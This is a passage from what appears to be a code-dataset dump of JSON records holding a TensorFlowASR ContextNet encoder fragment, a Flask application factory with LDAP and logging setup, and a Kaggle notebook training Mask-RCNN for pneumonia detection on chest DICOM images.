ContextNetEncoder(tf.keras.Model):\n def __init__(\n self,\n blocks: List[dict] = [],\n alpha: float = 1.0,\n kernel_regularizer=None,\n bias_regularizer=None,\n **kwargs,\n ):\n super(ContextNetEncoder, self).__init__(**kwargs)\n\n self.reshape = Reshape(name=f\"{self.name}_reshape\")\n\n self.blocks = []\n for i, config in enumerate(blocks):\n self.blocks.append(\n ConvBlock(\n **config,\n alpha=alpha,\n kernel_regularizer=kernel_regularizer,\n bias_regularizer=bias_regularizer,\n name=f\"{self.name}_block_{i}\",\n )\n )\n\n def call(\n self,\n inputs,\n training=False,\n **kwargs,\n ):\n outputs, input_length = inputs\n outputs = self.reshape(outputs)\n for block in self.blocks:\n outputs, input_length = block([outputs, input_length], training=training)\n return outputs\n", "repo_name": "TensorSpeech/TensorFlowASR", "sub_path": "tensorflow_asr/models/encoders/contextnet.py", "file_name": "contextnet.py", "file_ext": "py", "file_size_in_byte": 7082, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 877, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.keras.regularizers.l2", "line_number": 6, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 6, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 14, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 18, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow_asr.utils.math_util.merge_two_last_dims", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow_asr.utils.math_util", "line_number": 25, "usage_type": "name"}, {"api_name": "tensorflow.keras", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.SeparableConv1D", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 41, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.BatchNormalization", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras", 
"line_number": 51, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.divide", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 105, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 105, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 106, "usage_type": "call"}, {"api_name": "tensorflow.multiply", "line_number": 108, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tensorflow_asr.utils.math_util.get_reduced_length", "line_number": 191, "usage_type": "call"}, {"api_name": "tensorflow_asr.utils.math_util", "line_number": 191, "usage_type": "name"}, {"api_name": "tensorflow.add", "line_number": 195, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 200, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 203, "usage_type": "name"}]}
+{"seq_id": "32921679262", "text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom logging.handlers import RotatingFileHandler\nfrom flask import Flask\nfrom flask.logging import default_handler\nfrom redap.core import ldap, db, migrate\n\n\ndef create_app(package_name, *args, **kwargs):\n app = Flask(package_name, *args, instance_relative_config=True, **kwargs)\n\n # Fetch settings from config file\n app.config.from_object('redap.settings.core')\n app.config.from_object('redap.settings.ldap')\n\n # Init flask-ldapconn extension\n ldap.init_app(app)\n\n # Init SQLAlchemy\n db.init_app(app)\n migrate.init_app(app, db)\n\n if app.config['ENV'] == 'production':\n formatter = logging.Formatter(app.config['LOG_FORMAT'])\n\n handler = RotatingFileHandler('logs/application.log', maxBytes=10000, backupCount=3)\n handler.setLevel(logging.INFO)\n handler.setFormatter(formatter)\n\n app.logger.setLevel(logging.INFO)\n app.logger.addHandler(handler)\n app.logger.removeHandler(default_handler)\n\n # Check for errors upon request teardown\n @app.teardown_request\n def log_errors(error):\n if error is None:\n return\n\n app.logger.error(\"An error occurred while handling the request\", error)\n\n return app\n", "repo_name": "rbw/redap", "sub_path": "redap/factory.py", "file_name": "factory.py", "file_ext": "py", "file_size_in_byte": 1249, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 27, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "redap.core.ldap.init_app", "line_number": 18, "usage_type": "call"}, {"api_name": "redap.core.ldap", "line_number": 18, "usage_type": "name"}, {"api_name": "redap.core.db.init_app", "line_number": 21, "usage_type": "call"}, {"api_name": "redap.core.db", "line_number": 21, "usage_type": "name"}, {"api_name": "redap.core.migrate.init_app", "line_number": 22, "usage_type": "call"}, {"api_name": "redap.core.db", "line_number": 22, "usage_type": "argument"}, {"api_name": "redap.core.migrate", "line_number": 22, "usage_type": "name"}, {"api_name": "logging.Formatter", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 27, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 28, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.logging.default_handler", "line_number": 33, "usage_type": "argument"}]}
+{"seq_id": "10148034345", "text": "import os \nimport sys\nimport random\nimport math\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport json\nimport pydicom\nfrom imgaug import augmenters as iaa\nfrom tqdm import tqdm\nimport pandas as pd \nimport glob \n\n# ### First: Install Kaggle API for download competition data.\n\n# In[ ]:\n\n\nDATA_DIR = '/kaggle/input'\n\n# Directory to save logs and trained model\nROOT_DIR = '/kaggle/working'\n\n# ### MD.ai Annotator \n# \n# Additionally, If you are interested in augmenting the existing annotations, you can use the MD.ai annotator to view DICOM images, and create annotatios to be exported. \n# MD.ai annotator project URL for the Kaggle dataset: https://public.md.ai/annotator/project/LxR6zdR2/workspace\n# \n# **Annotator features**\n# - The annotator can be used to view DICOM images and create image and exam level annotations.\n# - You can apply the annotator to filter by label, adjudicate annotations, and assign annotation tasks to your team.\n# - Notebooks can be built directly within the annotator for rapid model development.\n# - The data wrangling is abstracted away by the interface and by our MD.ai library.\n# - Simplifies image annotation in order to widen the participation in the futrue of medical image deep learning.\n# \n# The annotator allows you to create initial annotations, build and run models, modify/finetune the annotations based on predicted values, and repeat. \n# The MD.ai python client library implements functions to easily download images and annotations and to prepare the datasets used to train the model for classification. See the following example notebook for parsing annotations and training using MD.ai annotator: \n# https://github.com/mdai/ml-lessons/blob/master/lesson3-rsna-pneumonia-detection-mdai-client-lib.ipynb \n# - MD.ai URL: https://www.md.ai \n# - MD.ai documentation URL: https://docs.md.ai/\n\n# ### Install Matterport's Mask-RCNN model from github.\n# See the [Matterport's implementation of Mask-RCNN](https://github.com/matterport/Mask_RCNN).\n\n# In[ ]:\n\n\nos.chdir('Mask_RCNN')\n#!python setup.py -q install\n\n# In[ ]:\n\n\n# Import Mask RCNN\nsys.path.append(os.path.join(ROOT_DIR, 'Mask_RCNN')) # To find local version of the library\nfrom mrcnn.config import Config\nfrom mrcnn import utils\nimport mrcnn.model as modellib\nfrom mrcnn import visualize\nfrom mrcnn.model import log\n\n# In[ ]:\n\n\ntrain_dicom_dir = os.path.join(DATA_DIR, 'stage_1_train_images')\ntest_dicom_dir = os.path.join(DATA_DIR, 'stage_1_test_images')\n\n# ### Some setup functions and classes for Mask-RCNN\n# \n# - dicom_fps is a list of the dicom image path and filenames \n# - image_annotions is a dictionary of the annotations keyed by the filenames\n# - parsing the dataset returns a list of the image filenames and the annotations dictionary\n\n# In[ ]:\n\n\ndef get_dicom_fps(dicom_dir):\n dicom_fps = glob.glob(dicom_dir+'/'+'*.dcm')\n return list(set(dicom_fps))\n\ndef parse_dataset(dicom_dir, anns): \n image_fps = get_dicom_fps(dicom_dir)\n image_annotations = {fp: [] for fp in image_fps}\n for index, row in anns.iterrows(): \n fp = os.path.join(dicom_dir, row['patientId']+'.dcm')\n image_annotations[fp].append(row)\n return image_fps, image_annotations \n\n# In[ ]:\n\n\n# The following parameters have been selected to reduce running time for demonstration purposes \n# These are not optimal \n\nclass DetectorConfig(Config):\n \"\"\"Configuration for training pneumonia detection on the RSNA pneumonia dataset.\n 
Overrides values in the base Config class.\n \"\"\"\n \n # Give the configuration a recognizable name \n NAME = 'pneumonia'\n \n # Train on 1 GPU and 8 images per GPU. We can put multiple images on each\n # GPU because the images are small. Batch size is 8 (GPUs * images/GPU).\n GPU_COUNT = 1\n IMAGES_PER_GPU = 8 \n \n BACKBONE = 'resnet50'\n \n NUM_CLASSES = 2 # background + 1 pneumonia classes\n \n IMAGE_MIN_DIM = 256\n IMAGE_MAX_DIM = 256\n RPN_ANCHOR_SCALES = (32, 64, 128, 256)\n TRAIN_ROIS_PER_IMAGE = 32\n MAX_GT_INSTANCES = 3\n DETECTION_MAX_INSTANCES = 3\n DETECTION_MIN_CONFIDENCE = 0.9\n DETECTION_NMS_THRESHOLD = 0.1\n\n STEPS_PER_EPOCH = 100\n \nconfig = DetectorConfig()\nconfig.display()\n\n# In[ ]:\n\n\nclass DetectorDataset(utils.Dataset):\n \"\"\"Dataset class for training pneumonia detection on the RSNA pneumonia dataset.\n \"\"\"\n\n def __init__(self, image_fps, image_annotations, orig_height, orig_width):\n super().__init__(self)\n \n # Add classes\n self.add_class('pneumonia', 1, 'Lung Opacity')\n \n # add images \n for i, fp in enumerate(image_fps):\n annotations = image_annotations[fp]\n self.add_image('pneumonia', image_id=i, path=fp, \n annotations=annotations, orig_height=orig_height, orig_width=orig_width)\n \n def image_reference(self, image_id):\n info = self.image_info[image_id]\n return info['path']\n\n def load_image(self, image_id):\n info = self.image_info[image_id]\n fp = info['path']\n ds = pydicom.read_file(fp)\n image = ds.pixel_array\n # If grayscale. Convert to RGB for consistency.\n if len(image.shape) != 3 or image.shape[2] != 3:\n image = np.stack((image,) * 3, -1)\n return image\n\n def load_mask(self, image_id):\n info = self.image_info[image_id]\n annotations = info['annotations']\n count = len(annotations)\n if count == 0:\n mask = np.zeros((info['orig_height'], info['orig_width'], 1), dtype=np.uint8)\n class_ids = np.zeros((1,), dtype=np.int32)\n else:\n mask = np.zeros((info['orig_height'], info['orig_width'], count), dtype=np.uint8)\n class_ids = np.zeros((count,), dtype=np.int32)\n for i, a in enumerate(annotations):\n if a['Target'] == 1:\n x = int(a['x'])\n y = int(a['y'])\n w = int(a['width'])\n h = int(a['height'])\n mask_instance = mask[:, :, i].copy()\n cv2.rectangle(mask_instance, (x, y), (x+w, y+h), 255, -1)\n mask[:, :, i] = mask_instance\n class_ids[i] = 1\n return mask.astype(np.bool), class_ids.astype(np.int32)\n\n# ### Examine the annotation data, parse the dataset, and view dicom fields\n\n# In[ ]:\n\n\n# training dataset\nanns = pd.read_csv(os.path.join(DATA_DIR, 'stage_1_train_labels.csv'))\nanns.head()\n\n# In[ ]:\n\n\nimage_fps, image_annotations = parse_dataset(train_dicom_dir, anns=anns)\n\n# In[ ]:\n\n\nds = pydicom.read_file(image_fps[0]) # read dicom image from filepath \nimage = ds.pixel_array # get image array\n\n# In[ ]:\n\n\n# show dicom fields \nds\n\n# In[ ]:\n\n\n# Original DICOM image size: 1024 x 1024\nORIG_SIZE = 1024\n\n# ### Split the data into training and validation datasets\n# **Note: We have only used only a portion of the images for demonstration purposes. See comments below.**\n# \n# - To use all the images do: image_fps_list = list(image_fps)\n# - Or change the number of images from 100 to a custom number\n\n# In[ ]:\n\n\n######################################################################\n# Modify this line to use more or fewer images for training/validation. 
\n# To use all images, do: image_fps_list = list(image_fps)\r\nimage_fps_list = list(image_fps[:1000]) \r\n#####################################################################\r\n\r\n# split dataset into training vs. validation dataset \r\n# split ratio is set to 0.9 vs. 0.1 (train vs. validation, respectively)\r\nimage_fps_list.sort()  # sort in place for a deterministic order before the seeded shuffle\r\nrandom.seed(42)\r\nrandom.shuffle(image_fps_list)\r\n\r\nvalidation_split = 0.1\r\nsplit_index = int((1 - validation_split) * len(image_fps_list))\r\n\r\nimage_fps_train = image_fps_list[:split_index]\r\nimage_fps_val = image_fps_list[split_index:]\r\n\r\nprint(len(image_fps_train), len(image_fps_val))\r\n\r\n# ### Create and prepare the training dataset using the DetectorDataset class.\r\n\r\n# In[ ]:\r\n\r\n\r\n# prepare the training dataset\r\ndataset_train = DetectorDataset(image_fps_train, image_annotations, ORIG_SIZE, ORIG_SIZE)\r\ndataset_train.prepare()\r\n\r\n# ### Let's look at a sample annotation. We see a bounding box with (x, y) of the top left corner as well as the width and height.\r\n\r\n# In[ ]:\r\n\r\n\r\n# Show annotation(s) for a DICOM image \r\ntest_fp = random.choice(image_fps_train)\r\nimage_annotations[test_fp]\r\n\r\n# In[ ]:\r\n\r\n\r\n# prepare the validation dataset\r\ndataset_val = DetectorDataset(image_fps_val, image_annotations, ORIG_SIZE, ORIG_SIZE)\r\ndataset_val.prepare()\r\n\r\n# ### Display a random image with bounding boxes\r\n\r\n# In[ ]:\r\n\r\n\r\n# Load and display random samples and their bounding boxes\r\n# Suggestion: Run this a few times to see different examples. \r\n\r\nimage_id = random.choice(dataset_train.image_ids)\r\nimage_fp = dataset_train.image_reference(image_id)\r\nimage = dataset_train.load_image(image_id)\r\nmask, class_ids = dataset_train.load_mask(image_id)\r\n\r\nprint(image.shape)\r\n\r\nplt.figure(figsize=(10, 10))\r\nplt.subplot(1, 2, 1)\r\nplt.imshow(image[:, :, 0], cmap='gray')\r\nplt.axis('off')\r\n\r\nplt.subplot(1, 2, 2)\r\nmasked = np.zeros(image.shape[:2])\r\nfor i in range(mask.shape[2]):\r\n    masked += image[:, :, 0] * mask[:, :, i]\r\nplt.imshow(masked, cmap='gray')\r\nplt.axis('off')\r\n\r\nprint(image_fp)\r\nprint(class_ids)\r\n\r\n# In[ ]:\r\n\r\n\r\nmodel = modellib.MaskRCNN(mode='training', config=config, model_dir=ROOT_DIR)\r\n\r\n# ### Image Augmentation. Try finetuning some variables to custom values\r\n\r\n# In[ ]:\r\n\r\n\r\n# Image augmentation \r\naugmentation = iaa.SomeOf((0, 1), [\r\n    iaa.Fliplr(0.5),\r\n    iaa.Affine(\r\n        scale={\"x\": (0.8, 1.2), \"y\": (0.8, 1.2)},\r\n        translate_percent={\"x\": (-0.2, 0.2), \"y\": (-0.2, 0.2)},\r\n        rotate=(-25, 25),\r\n        shear=(-8, 8)\r\n    ),\r\n    iaa.Multiply((0.9, 1.1))\r\n])\r\n\r\n# ### Now it's time to train the model. Note that training even a basic model can take a few hours. \r\n# \r\n# Note: the following model is for demonstration purposes only. We have limited the training to one epoch, and have set nominal values for the Detector Configuration to reduce run-time. 
\n# \r\n# - dataset_train and dataset_val are derived from DetectorDataset \r\n# - DetectorDataset loads images from image filenames and masks from the annotation data\r\n# - model is Mask-RCNN\r\n\r\n# In[ ]:\r\n\r\n\r\nNUM_EPOCHS = 1\r\n\r\n# Train Mask-RCNN Model \r\nimport warnings \r\nwarnings.filterwarnings(\"ignore\")\r\nmodel.train(dataset_train, dataset_val, \r\n            learning_rate=config.LEARNING_RATE, \r\n            epochs=NUM_EPOCHS, \r\n            layers='all',\r\n            augmentation=augmentation)\r\n\r\n# In[ ]:\r\n\r\n\r\n# select trained model \r\ndir_names = next(os.walk(model.model_dir))[1]\r\nkey = config.NAME.lower()\r\ndir_names = filter(lambda f: f.startswith(key), dir_names)\r\ndir_names = sorted(dir_names)\r\n\r\nif not dir_names:\r\n    import errno\r\n    raise FileNotFoundError(\r\n        errno.ENOENT,\r\n        \"Could not find model directory under {}\".format(model.model_dir))\r\n    \r\nfps = []\r\n# Pick last directory\r\nfor d in dir_names: \r\n    dir_name = os.path.join(model.model_dir, d)\r\n    # Find the last checkpoint\r\n    checkpoints = next(os.walk(dir_name))[2]\r\n    checkpoints = filter(lambda f: f.startswith(\"mask_rcnn\"), checkpoints)\r\n    checkpoints = sorted(checkpoints)\r\n    if not checkpoints:\r\n        print('No weight files in {}'.format(dir_name))\r\n    else: \r\n        \r\n        checkpoint = os.path.join(dir_name, checkpoints[-1])\r\n        fps.append(checkpoint)\r\n\r\nmodel_path = sorted(fps)[-1]\r\nprint('Found model {}'.format(model_path))\r\n\r\n# In[ ]:\r\n\r\n\r\nclass InferenceConfig(DetectorConfig):\r\n    GPU_COUNT = 1\r\n    IMAGES_PER_GPU = 1\r\n\r\ninference_config = InferenceConfig()\r\n\r\n# Recreate the model in inference mode\r\nmodel = modellib.MaskRCNN(mode='inference', \r\n                          config=inference_config,\r\n                          model_dir=ROOT_DIR)\r\n\r\n# Load trained weights (fill in path to trained weights here)\r\nassert model_path != \"\", \"Provide path to trained weights\"\r\nprint(\"Loading weights from \", model_path)\r\nmodel.load_weights(model_path, by_name=True)\r\n\r\n# In[ ]:\r\n\r\n\r\n# set color for class\r\ndef get_colors_for_class_ids(class_ids):\r\n    colors = []\r\n    for class_id in class_ids:\r\n        if class_id == 1:\r\n            colors.append((.941, .204, .204))\r\n    return colors\r\n\r\n# ### How does the predicted box compare to the expected value? Let's use the validation dataset to check. \r\n# \r\n# Note that we trained only one epoch for **demonstration purposes ONLY**. You might be able to improve performance by running more epochs. \r\n\r\n# In[ ]:\r\n\r\n\r\n# Show a few examples of ground truth vs. 
predictions on the validation dataset \ndataset = dataset_val\nfig = plt.figure(figsize=(10, 30))\n\nfor i in range(4):\n\n image_id = random.choice(dataset.image_ids)\n \n original_image, image_meta, gt_class_id, gt_bbox, gt_mask =\\\n modellib.load_image_gt(dataset_val, inference_config, \n image_id, use_mini_mask=False)\n \n print(original_image.shape)\n plt.subplot(6, 2, 2*i + 1)\n visualize.display_instances(original_image, gt_bbox, gt_mask, gt_class_id, \n dataset.class_names,\n colors=get_colors_for_class_ids(gt_class_id), ax=fig.axes[-1])\n \n plt.subplot(6, 2, 2*i + 2)\n results = model.detect([original_image]) #, verbose=1)\n r = results[0]\n visualize.display_instances(original_image, r['rois'], r['masks'], r['class_ids'], \n dataset.class_names, r['scores'], \n colors=get_colors_for_class_ids(r['class_ids']), ax=fig.axes[-1])\n\n# In[ ]:\n\n\n# Get filenames of test dataset DICOM images\ntest_image_fps = get_dicom_fps(test_dicom_dir)\n\n# ### Final steps - Create the submission file\n\n# In[ ]:\n\n\n# Make predictions on test images, write out sample submission \ndef predict(image_fps, filepath='submission.csv', min_conf=0.95): \n \n # assume square image\n resize_factor = ORIG_SIZE / config.IMAGE_SHAPE[0]\n #resize_factor = ORIG_SIZE \n with open(filepath, 'w') as file:\n for image_id in tqdm(image_fps): \n ds = pydicom.read_file(image_id)\n image = ds.pixel_array\n # If grayscale. Convert to RGB for consistency.\n if len(image.shape) != 3 or image.shape[2] != 3:\n image = np.stack((image,) * 3, -1) \n image, window, scale, padding, crop = utils.resize_image(\n image,\n min_dim=config.IMAGE_MIN_DIM,\n min_scale=config.IMAGE_MIN_SCALE,\n max_dim=config.IMAGE_MAX_DIM,\n mode=config.IMAGE_RESIZE_MODE)\n \n patient_id = os.path.splitext(os.path.basename(image_id))[0]\n\n results = model.detect([image])\n r = results[0]\n\n out_str = \"\"\n out_str += patient_id \n out_str += \",\"\n assert( len(r['rois']) == len(r['class_ids']) == len(r['scores']) )\n if len(r['rois']) == 0: \n pass\n else: \n num_instances = len(r['rois'])\n \n for i in range(num_instances): \n if r['scores'][i] > min_conf: \n out_str += ' '\n out_str += str(round(r['scores'][i], 2))\n out_str += ' '\n\n # x1, y1, width, height \n x1 = r['rois'][i][1]\n y1 = r['rois'][i][0]\n width = r['rois'][i][3] - x1 \n height = r['rois'][i][2] - y1 \n bboxes_str = \"{} {} {} {}\".format(x1*resize_factor, y1*resize_factor, \\\n width*resize_factor, height*resize_factor) \n# bboxes_str = \"{} {} {} {}\".format(x1, y1, \\\n# width, height)\n out_str += bboxes_str\n\n file.write(out_str+\"\\n\")\n\n# In[ ]:\n\n\n# predict only the first 50 entries\nsubmission_fp = os.path.join(ROOT_DIR, 'submission.csv')\nprint(submission_fp)\npredict(test_image_fps, filepath=submission_fp)\n\n# In[ ]:\n\n\noutput = pd.read_csv(submission_fp, names=['patientId', 'PredictionString'])\noutput.head(100)\n\n# In[ ]:\n\n\n## show submission.csv content\n#os.chdir(ROOT_DIR)\n#!cat submission.csv\n\n# In[ ]:\n\n\n# show a few test image detection example\ndef visualize(): \n image_id = random.choice(test_image_fps)\n ds = pydicom.read_file(image_id)\n \n # original image \n image = ds.pixel_array\n \n # assume square image \n resize_factor = ORIG_SIZE / config.IMAGE_SHAPE[0]\n \n # If grayscale. 
Convert to RGB for consistency.\n if len(image.shape) != 3 or image.shape[2] != 3:\n image = np.stack((image,) * 3, -1) \n resized_image, window, scale, padding, crop = utils.resize_image(\n image,\n min_dim=config.IMAGE_MIN_DIM,\n min_scale=config.IMAGE_MIN_SCALE,\n max_dim=config.IMAGE_MAX_DIM,\n mode=config.IMAGE_RESIZE_MODE)\n\n patient_id = os.path.splitext(os.path.basename(image_id))[0]\n print(patient_id)\n\n results = model.detect([resized_image])\n r = results[0]\n for bbox in r['rois']: \n print(bbox)\n x1 = int(bbox[1] * resize_factor)\n y1 = int(bbox[0] * resize_factor)\n x2 = int(bbox[3] * resize_factor)\n y2 = int(bbox[2] * resize_factor)\n cv2.rectangle(image, (x1,y1), (x2,y2), (77, 255, 9), 3, 1)\n width = x2 - x1 \n height = y2 - y1 \n print(\"x {} y {} h {} w {}\".format(x1, y1, width, height))\n plt.figure() \n plt.imshow(image, cmap=plt.cm.gist_gray)\n\nvisualize()\n\n# In[ ]:\n\n\n# remove files to allow committing (hit files limit otherwise)\n", "repo_name": "tetherless-world/CodeGraph", "sub_path": "kaggle/python_files/sample774.py", "file_name": "sample774.py", "file_ext": "py", "file_size_in_byte": 17459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.chdir", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "mrcnn.config.Config", "line_number": 96, "usage_type": "name"}, {"api_name": "mrcnn.utils.Dataset", "line_number": 130, "usage_type": "attribute"}, {"api_name": "mrcnn.utils", "line_number": 130, "usage_type": "name"}, {"api_name": "pydicom.read_file", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 165, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 168, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 169, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 177, "usage_type": "call"}, {"api_name": "numpy.bool", "line_number": 180, "usage_type": "attribute"}, {"api_name": "numpy.int32", "line_number": 180, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path", "line_number": 188, "usage_type": "attribute"}, {"api_name": 
"pydicom.read_file", "line_number": 199, "usage_type": "call"}, {"api_name": "random.seed", "line_number": 232, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 233, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 258, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 276, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 285, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 286, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 286, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 288, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 292, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 293, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 293, "usage_type": "name"}, {"api_name": "mrcnn.model.MaskRCNN", "line_number": 301, "usage_type": "call"}, {"api_name": "mrcnn.model", "line_number": 301, "usage_type": "name"}, {"api_name": "imgaug.augmenters.SomeOf", "line_number": 309, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 309, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Fliplr", "line_number": 310, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 310, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Affine", "line_number": 311, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 311, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Multiply", "line_number": 317, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 317, "usage_type": "name"}, {"api_name": "warnings.filterwarnings", "line_number": 335, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 346, "usage_type": "call"}, {"api_name": "errno.ENOENT", "line_number": 354, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 360, "usage_type": "call"}, {"api_name": "os.path", "line_number": 360, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 362, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 369, "usage_type": "call"}, {"api_name": "os.path", "line_number": 369, "usage_type": "attribute"}, {"api_name": "mrcnn.model.MaskRCNN", "line_number": 385, "usage_type": "call"}, {"api_name": "mrcnn.model", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 414, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 414, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 418, "usage_type": "call"}, {"api_name": "mrcnn.model.load_image_gt", "line_number": 421, "usage_type": "call"}, {"api_name": "mrcnn.model", "line_number": 421, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 425, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot", "line_number": 425, "usage_type": "name"}, {"api_name": "mrcnn.visualize.display_instances", "line_number": 426, "usage_type": "call"}, {"api_name": "mrcnn.visualize", "line_number": 426, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 430, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 430, "usage_type": "name"}, {"api_name": "mrcnn.visualize.display_instances", "line_number": 433, "usage_type": "call"}, {"api_name": "mrcnn.visualize", "line_number": 433, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 455, "usage_type": "call"}, {"api_name": "pydicom.read_file", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 460, "usage_type": "call"}, {"api_name": "mrcnn.utils.resize_image", "line_number": 461, "usage_type": "call"}, {"api_name": "mrcnn.utils", "line_number": 461, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path", "line_number": 468, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 505, "usage_type": "call"}, {"api_name": "os.path", "line_number": 505, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 512, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 527, "usage_type": "call"}, {"api_name": "pydicom.read_file", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 538, "usage_type": "call"}, {"api_name": "mrcnn.utils.resize_image", "line_number": 539, "usage_type": "call"}, {"api_name": "mrcnn.utils", "line_number": 539, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 546, "usage_type": "call"}, {"api_name": "os.path", "line_number": 546, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 546, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 557, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", 